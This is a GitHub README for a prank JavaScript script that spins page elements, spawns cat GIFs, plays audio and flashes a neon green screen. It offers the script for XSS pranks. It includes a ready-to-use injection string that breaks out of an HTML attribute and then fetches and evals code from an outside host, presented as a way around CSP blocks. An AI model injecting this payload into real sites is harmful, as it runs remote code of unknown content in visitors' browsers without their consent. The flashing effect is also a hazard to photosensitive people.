Skip to content

Latest commit

 

History

History
36 lines (24 loc) · 887 Bytes

File metadata and controls

36 lines (24 loc) · 887 Bytes

🐱 Spinning Cat Chaos Script

Spinning Cat

This repository contains a chaotic JavaScript script that:

  • Plays an audio file of a cat song.
  • Spawns spinning cat GIFs all over the page.
  • Flashes a neon green screen intermittently (warning).
  • Makes all elements on the page spin.

Perfect for XSS demonstrations or just to prank your friends!


🚀 Usage

1. Direct Link

You can directly embed the script using this URL:

<script src="https://meowww.lol/cat.js"></script>

2. Fetch and Execute Inline

If external scripts are blocked by CSP, try this:

"><script>fetch('https://meowww.lol/cat.js').then(r=>r.text()).then(eval)</script>

💬 Contact

https://x.com/theonejvo

https://www.linkedin.com/in/theonejvo/

Enjoy the chaos! 🐱🎶💚🔄